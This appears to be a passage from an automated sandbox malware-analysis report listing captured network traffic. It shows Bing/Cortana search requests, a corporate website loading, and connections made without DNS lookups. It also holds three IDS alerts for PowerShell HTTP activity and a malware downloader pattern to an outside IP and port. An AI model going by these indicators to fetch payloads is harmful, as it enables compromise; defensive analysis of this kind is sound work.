          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powerzh&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=7&cvid=af41f482fd644dc08e178ad70ac98253&ig=15c32915b8c04714be06c7e807bbea0b HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Non
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powerzhe&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=8&cvid=af41f482fd644dc08e178ad70ac98253&ig=a2774f340a9249c8818ab36338fba167 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: No
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powerzhel&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=9&cvid=af41f482fd644dc08e178ad70ac98253&ig=a2534177ed6a4318a3480e74ea6d1a20 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: N
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powerzhell&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=10&cvid=af41f482fd644dc08e178ad70ac98253&ig=31c1ce68ffec44f3966ebbb3c57b0312 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities:
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powers&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=6&cvid=af41f482fd644dc08e178ad70ac98253&ig=8db12d7da2ff4c3a8ce6329665e80935 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: None
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powershe&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=8&cvid=af41f482fd644dc08e178ad70ac98253&ig=bbaaa87cbeb84a5cbc94be882d75ec3c HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: No
          Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powersh&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=7&cvid=af41f482fd644dc08e178ad70ac98253&ig=cc413f5a3fd04e32b55e61a85c42466e HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Non
          Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: id
          Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: id
          Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1749241507x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: 7BEA6F878EDC4C4094AFDFC5350B3819x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Timex-userageclass: Unknownaccept-encoding:
          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.17:49809 -> 74.208.195.188:5927
          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.17:49893 -> 74.208.195.188:5927
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.17:49893 -> 74.208.195.188:5927
          Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
          Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
          Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
          Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
          Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
          Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
          Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
          Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
          Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
          Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
          Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
          Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
          Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
          Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
          Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
          Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
          Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
          Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
          Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
          Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
          Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
          Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
          Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
          Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.25
          Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.25
          Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.25
          Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.25
          Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.25
          Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.25
          Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.25
          Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.25
          Source: global trafficHTTP traffic detected: GET /our-story HTTP/1.1host: www.elevate.incsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
          Source: global trafficHTTP traffic detected: GET /6537d1496ae55969d9298a91/js/elevate-redesign.schunk.36b8fb49256177c8.js HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
          Source: global trafficHTTP traffic detected: GET /6537d1496ae55969d9298a91/css/elevate-redesign.shared.cb8a3df76.min.css HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
          Source: global trafficHTTP traffic detected: GET /js/jquery-3.5.1.min.dc5e7f18c8.js?site=6537d1496ae55969d9298a91 HTTP/1.1host: d3e54v103j8qbb.cloudfront.netorigin: https://www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
          Source: global trafficHTTP traffic detected: GET /6537d1496ae55969d9298a91/js/elevate-redesign.9f6e0829.939bacf454813a58.js HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
          Source: global trafficHTTP traffic detected: GET /6537d1496ae55969d9298a91/658c475399e5cbfecce1c499_elevate%20-%20logo%20white.webp HTTP/1.1host: cdn.prod.website-files.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
          Source: global trafficHTTP traffic detected: GET /use-cases/benefit-platforms HTTP/1.1host: www.elevate.incsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://www.elevate.inc/our-storyaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
          Source: global trafficHTTP traffic detected: GET /widgets/media.html?src=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435%3Fapp_id%3D122963&dntp=1&display_name=Vimeo&url=https%3A%2F%2Fplayer.vimeo.com%2Fvideo%2F901646435&image=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F1780645815-06152f51d9ac0a046994d9ba4942d0d82fa2fe1ace9ea600abb9f1075c607855-d_1280&key=c4e54deccf4d4ec997a64902e9a30300&type=text%2Fhtml&schema=vimeo HTTP/1.1Host: cdn.embedly.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://www.elevate.inc/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /npm/@finsweet/cookie-consent@1/fs-cc.js HTTP/1.1host: cdn.jsdelivr.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /19524073.js HTTP/1.1host: js.hs-scripts.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
